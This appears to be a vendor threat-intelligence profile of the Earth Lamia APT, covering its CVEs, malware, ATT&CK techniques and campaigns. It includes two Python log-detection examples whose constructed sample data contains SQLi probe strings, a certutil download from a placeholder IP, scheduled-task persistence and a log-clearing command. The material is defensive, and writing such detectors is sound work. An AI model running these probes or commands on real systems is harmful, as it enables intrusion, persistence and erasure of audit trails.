Introduction
Earth Lamia is a China-linked Advanced Persistent Threat (APT) group conducting cyber espionage campaigns across Brazil, India, and Southeast Asia. Active since at least 2023, the group focuses on web application vulnerabilities, custom malware deployment, and systematic targeting of government, finance, and critical infrastructure sectors.
Historical Evolution
- 2023–Early 2024: Initial focus on financial services (e.g., securities firms) in South Asia
- Mid-2024: Expansion into logistics and online retail across Southeast Asia
- Late 2024–2025: Shift to academic, IT, and government entities, including critical infrastructure
Attribution to China is strongly supported by the group's toolsets, language artifacts, victimology, and operational patterns.
China-linked threat actors targeting web application vulnerabilities operate with patience and precision. Organizations running customer-facing applications in Asia need threat intelligence that reflects active targeting patterns.
Noorstream delivers threat intelligence, vulnerability management, and offensive security assessments for high-risk environments.
Technical Breakdown
Initial Access
- Systematic scanning for SQLi in public-facing apps
- Exploitation using tools like sqlmap
- Creation of rogue admin accounts (e.g., sysadmin123)
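The initial-access pattern above (automated SQLi probing, a scanner User-Agent, then use of a freshly created admin account) can be surfaced from ordinary web server logs. The following Python is an added example, not code from the Trend Micro report or from Noorstream; the log lines are constructed, the Apache combined-log layout and the /admin/login endpoint are assumptions, and the SQLi regex covers only the common boolean, UNION and time-based probe shapes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache "combined"-format lines (not real traffic) showing the
# pattern above: SQLi probing, a sqlmap User-Agent, then a later login to an
# admin endpoint as the newly created account from the same address.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2025:10:01:02 +0000] "GET /api/items?id=1'%20AND%201=1-- HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [12/May/2025:10:01:03 +0000] "GET /api/items?id=1%20UNION%20SELECT%20null,version()-- HTTP/1.1" 500 88 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [12/May/2025:10:01:04 +0000] "GET /search?q=x'%20OR%20SLEEP(5)%23 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2025:10:02:00 +0000] "GET /api/items?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2025:10:09:30 +0000] "POST /admin/login?user=sysadmin123 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Decoded-query patterns typical of automated SQLi probing (boolean, UNION,
# time-based, comment terminators).
SQLI_RE = re.compile(
    r"('\s*(and|or)\s+\d+=\d+)|(union\s+select)|(\bsleep\s*\()|(--\s*$)|(#\s*$)",
    re.IGNORECASE,
)
SCANNER_UA_RE = re.compile(r"sqlmap", re.IGNORECASE)

def analyze(log_text):
    """Return {ip: {"sqli": n, "scanner_ua": n, "admin_login": [urls]}} for
    addresses that probed for SQLi or announced a scanner User-Agent."""
    per_ip = defaultdict(lambda: {"sqli": 0, "scanner_ua": 0, "admin_login": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ua, url = m["ip"], m["ua"], unquote_plus(m["url"])
        if SCANNER_UA_RE.search(ua):
            per_ip[ip]["scanner_ua"] += 1
        if SQLI_RE.search(url):
            per_ip[ip]["sqli"] += 1
        # An admin-endpoint login from an address that already probed for SQLi
        # is the rogue-account follow-on step worth alerting on.
        if "/admin/login" in url and (per_ip[ip]["sqli"] or per_ip[ip]["scanner_ua"]):
            per_ip[ip]["admin_login"].append(url)
    return {ip: v for ip, v in per_ip.items() if v["sqli"] or v["scanner_ua"]}
```

The benign client 198.51.100.4 is dropped from the result; the probing address is reported with its counts and the admin login it attempted afterwards.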
Exploited CVEs
- Legacy: CVE-2017-9805 (Apache Struts2), CVE-2021-22205 (GitLab)
- 2024: CVE-2024-9047, CVE-2024-27198, CVE-2024-27199, CVE-2024-51378, CVE-2024-51567, CVE-2024-56145
- 2025: CVE-2025-31324 (SAP NetWeaver RCE)
Malware Arsenal
PULSEPACK (.NET modular backdoor)
- AES-encrypted TCP and WebSocket comms
- Plugin-based dynamic capability loading
- Deployed via DLL sideloading
BypassBoss
- Privilege escalation based on Sharp4PrinterNotifyPotato
Utility Stack
- Recon: Fscan, Kscan, nltest.exe
- Creds: SAM/LSASS memory extractors
- Persistence: schtasks.exe
- Cleanup: wevtutil.exe
- Tunnels: Rakshasa, Stowaway
TTPs (MITRE ATT&CK Mapping)
- Recon: T1595.002, T1590
- Access: T1190, T1078
- Execution: T1059.001, T1059.003
- Persistence: T1053.005, T1505.003, T1136.001
- Evasion: T1574.001, T1620, T1036.005
- C2: T1095, T1573.001
Post-Exploitation Flow
- Tool deployment via certutil.exe/PowerShell
- Web shell deployment
- Privilege escalation (Potato-family COM/DCOM exploits [2022 variant], JuicyPotato, BypassBoss)
- Credential harvesting
- Lateral movement
- Data exfiltration
- Log cleanup
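Individually, each step of the flow above is noisy; together on one host within a short window they are a strong signal. The following Python is an added example, not code from the Trend Micro report or from Noorstream: it correlates constructed Windows Security-log events against the stages listed here. Event IDs 4688, 4720, 4732 and 1102 are the standard Windows ones; the hostnames, timestamps, task name and download URL are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Windows Security-log events (not from a real incident) that walk
# the flow above on WEB01; DB02 carries only benign admin activity.
EVENTS = [
    {"host": "WEB01", "ts": "2025-05-12T10:15:00", "id": 4688,
     "cmd": "certutil.exe -urlcache -split -f http://198.51.100.9/t.txt C:\\Windows\\Temp\\t.exe"},
    {"host": "WEB01", "ts": "2025-05-12T10:16:10", "id": 4720, "account": "sysadmin123"},
    {"host": "WEB01", "ts": "2025-05-12T10:16:11", "id": 4732, "account": "sysadmin123",
     "group": "Administrators"},
    {"host": "WEB01", "ts": "2025-05-12T10:20:00", "id": 4688,
     "cmd": "schtasks.exe /create /sc onlogon /tn Updater /tr C:\\Windows\\Temp\\t.exe"},
    {"host": "WEB01", "ts": "2025-05-12T11:40:00", "id": 4688, "cmd": "wevtutil.exe cl Security"},
    {"host": "WEB01", "ts": "2025-05-12T11:40:01", "id": 1102},
    {"host": "DB02", "ts": "2025-05-12T09:00:00", "id": 4688, "cmd": "powershell.exe -File C:\\ops\\backup.ps1"},
]

def stage_of(e):
    """Map one event to a stage of the flow above, or None if unremarkable.
    4688 = process created, 4720 = user created, 4732 = local group member added,
    1102 = audit log cleared."""
    cmd = e.get("cmd", "").lower()
    if e["id"] == 4688 and "certutil" in cmd and "-urlcache" in cmd:
        return "tool_download"      # certutil.exe fetch (T1105)
    if e["id"] == 4720:
        return "rogue_account"      # T1136.001
    if e["id"] == 4732 and e.get("group") == "Administrators":
        return "rogue_admin"        # new account granted local admin (T1078 follow-on)
    if e["id"] == 4688 and "schtasks" in cmd and "/create" in cmd:
        return "persistence"        # T1053.005
    if e["id"] == 1102 or (e["id"] == 4688 and "wevtutil" in cmd and " cl " in cmd):
        return "log_cleanup"        # T1070.001
    return None

def correlate(events, window_hours=4):
    """Return {host: [stages in order]} for hosts where at least three distinct
    stages occur within window_hours; isolated single stages are left for triage."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        stage = stage_of(e)
        if stage:
            by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), stage))
    alerts = {}
    for host, hits in by_host.items():
        span_h = (hits[-1][0] - hits[0][0]).total_seconds() / 3600
        stages = list(dict.fromkeys(s for _, s in hits))   # dedupe, keep order
        if len(stages) >= 3 and span_h <= window_hours:
            alerts[host] = stages
    return alerts
```

Tightening window_hours or raising the stage threshold trades sensitivity for noise; the DB02 PowerShell backup never matches a stage and so never contributes.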
Case Studies
REF0657 Campaign (2024)
Financial sector in South Asia; Cobalt Strike via MemoryEvasion; Sophosx64.exe as Potato-family privilege escalation module (2022 variant)
STAC6451 (2024)
Mimic ransomware attempts in India; unsuccessful, and likely used as a distraction
CL-STA-0048 (2025)
DNS exfiltration, hex staging, and SQLcmd abuse in South Asia
DragonRank Links
Potential operational overlap or coordination with another China-nexus APT
Strategic Implications
- Nation-State Objectives: Intelligence gathering on finance, telecom, and government
- Tool Adaptability: Weaponization of open-source and legacy tooling
- Infrastructure Abuse: High-volume IP use across Asia-Pacific
- Blurred Lines: Espionage mixed with pseudo-ransomware operations
Future Outlook
Earth Lamia is likely to:
- Continue weaponizing zero-days in enterprise platforms
- Improve malware stealth (e.g., more fileless, in-memory variants)
- Expand to target under-patched sectors like health, education, and energy
- Scale operations through automation (vuln scanning, loader chains)
Noorstream Perspective
Earth Lamia reflects a new class of APTs: high-discipline cyber actors merging legacy exploit reliability with modern malware modularity. Their operational flow—web app scanning → SQLi → sideloaded implants → staged exfil—demands continuous vigilance.
This threat reinforces our doctrine:
Context is the new perimeter. Patch priority is intelligence-driven. Legacy does not mean low-risk.
Every defender must transition from CVSS-based triage to contextual vulnerability management and threat-centric hunting.
References
Source: Trend Micro Research
Title: “Earth Lamia Develops Custom Arsenal to Target Multiple Industries”
Date: May 26, 2025
URL: https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html
Source Type: Primary Threat Report
Attribution Confidence: High
Source: Elastic Security Labs
Title: “Unmasking a Financial Services Intrusion: REF0657”
Date: January 30, 2024
URL: https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657
Source Type: Incident Analysis
Attribution Confidence: High
Source: Fortinet FortiGuard
Title: “Earth Lamia APT Attack Campaign Overview”
Date: April 2025
URL: https://fortiguard.fortinet.com/outbreak-alert/earth-lamia-apt-attack
Source Type: Threat Summary
Attribution Confidence: Medium
Source: Unit42 (Palo Alto Networks)
Title: “Espionage Campaign Targets South Asian Entities”
Date: February 2025
URL: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/
Source Type: Campaign Analysis
Attribution Confidence: High
Source: The Hacker News
Title: “China-Linked Hackers Exploit SAP and Visual Composer Platforms”
Date: May 2025
URL: https://thehackernews.com/2025/05/china-linked-hackers-exploit-sap-and.html
Source Type: Exploit Disclosure Reporting
Attribution Confidence: High
Source: Cybersecurity Help CZ
Title: “APT Group Earth Lamia Exploits SQL Injection for Persistent Access”
Date: April 2025
URL: https://www.cybersecurity-help.cz/blog/4761.html
Source Type: Technical Threat Blog
Attribution Confidence: Medium
Source: LinkedIn Pulse – Bise Threat Research
Title: “Modular Backdoor Threats Target Brazil, India, Southeast Asia”
Date: September 2024
URL: https://www.linkedin.com/pulse/modular-backdoor-threats-risks-brazil-india-southeast-bise–5yl7e
Source Type: Malware Analysis
Attribution Confidence: Medium